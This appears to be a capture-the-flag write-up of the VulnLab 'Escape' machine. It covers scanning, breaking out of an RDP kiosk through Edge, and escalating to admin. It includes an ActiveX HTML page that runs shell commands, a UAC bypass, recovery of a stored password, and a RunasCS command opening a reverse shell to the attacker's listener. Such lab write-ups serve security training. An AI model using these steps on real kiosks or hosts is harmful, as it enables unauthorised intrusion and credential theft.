Post

VulnLab Escape

VulnLab Escape

VulnLab Escape

Escape

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─$ rustscan -a 10.10.125.141 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.125.141:3389
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 20:34 +05
Initiating Ping Scan at 20:34
Scanning 10.10.125.141 [4 ports]
Completed Ping Scan at 20:34, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:34
Completed Parallel DNS resolution of 1 host. at 20:34, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:34
Scanning 10.10.125.141 [1 port]
Discovered open port 3389/tcp on 10.10.125.141
Completed SYN Stealth Scan at 20:34, 0.10s elapsed (1 total ports)
Nmap scan report for 10.10.125.141
Host is up, received echo-reply ttl 127 (0.088s latency).
Scanned at 2024-12-12 20:34:39 +05 for 0s

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (72B)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─$ nmap -sC -sV -p3389 10.10.125.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 20:32 +05
Nmap scan report for 10.10.125.141
Host is up (0.087s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-12T15:31:27+00:00; -1m19s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041
|_  System_Time: 2024-12-12T15:31:23+00:00
| ssl-cert: Subject: commonName=Escape
| Not valid before: 2024-12-11T15:27:17
|_Not valid after:  2025-06-12T15:27:17
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m19s, deviation: 0s, median: -1m19s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds

User

Only RDP port is open, let’s try connecting.

1
└─$ xfreerdp /v:10.10.125.141 /dynamic-resolution +clipboard -sec-nla

Seems like a KIOSK

Enter username: KiosUser0 ana empty password. Then we can press WIN button and search for Edge/Internet, and open Microsoft Edge

From there we can navigate to file://C:/ which will show us content of C: drive. Now we can retrieve user flag.

Root

Now we need to get reverse shell. There is a nice blog regarding gaining RCE in KIOSK.

First we can download cmd.exe from C:\Windows\System32\, then rename it to msedge.exe (since it’s name is in the whitelist). After downloading open location of the file and then press F2 to rename it.

Another way would be to upload the following script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<html>
<body>
    <script>
    function shlExec() {
        var cmd = document.getElementById('cmd').value
        var shell = new ActiveXObject("WScript.Shell");
        try {
            var execOut = shell.Exec("cmd.exe /C \"" + cmd + "\"");
        } catch (e) {
            console.log(e);
        }

        var cmdStdOut = execOut.StdOut;
        var out = cmdStdOut.ReadAll();
        alert(out);
    }
</script>

<form onsubmit="shlExec()">
    Command: <input id="cmd" name="cmd" type="text">
    <input type="submit">
</form> 
</body>
</html>

Then in msedge, navigate to Settings > Default browser and set Allow sites to be reloaded in Internet Explorer mode to Allow open this file. Set url to file:///C:/Users/kioskUser0/Downloads/pwn.html

Now, we have to create this file. We can do it via developer tools

Click Edit as HTML and delete everything. Paste the snippet above.

Now save it as pwn.html (CTRL+S)

Visit page file:///C:/Users/kioskUser0/Downloads/pwn.html. We should allow blocked content (popup down below)

Then we run our command. Click Yes in popup window (it will appear every time we execute command)

And we see results in another window popup

Okay, let’s continue with privilege escalation. I’ll use cmd approach. We find interesting _admin folder with profiles.xml file in it

The file is related to Remote Desktop Plus which is located in C:\Program Files (x86)\Remote Desktop Plus

First, we can try opening it with rdp.exe by importing the profile. Thus copy the profile to Downloads folder and then run rdp.exe

Now, open the rdp.exe and import the profile

Notice that the password is obfuscated. Thus, we need BullePassView, which is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. When we click Edit on profile, BullePassView will display the password in the plaintext

Now we have admin user from Administrators group. So, now we can either use RunasCS and receive reverse shell, or we can simply use runas from cmd.exe. Let’s try with runas. We run runas /user:ESCAPE\admin cmd, and see that the process is running in medium integrity level.

To bypass UAC, we can simply start Start-Process powershell -Verb runas from powershell. We we get UAC dialog, where we click Yes. Now we have elevated process.

To run RunasCS, we need to download both netcat and tools itself.

Then we have to run the following command

1
.\r.exe admin <REDACTED> -r 10.8.4.147:9000 cmd.exe --bypass-uac  

And we receive our shell

https://api.vulnlab.com/api/v1/share?id=059ab679-8b32-4a73-a38d-876c08c22088

This post is licensed under CC BY 4.0 by the author.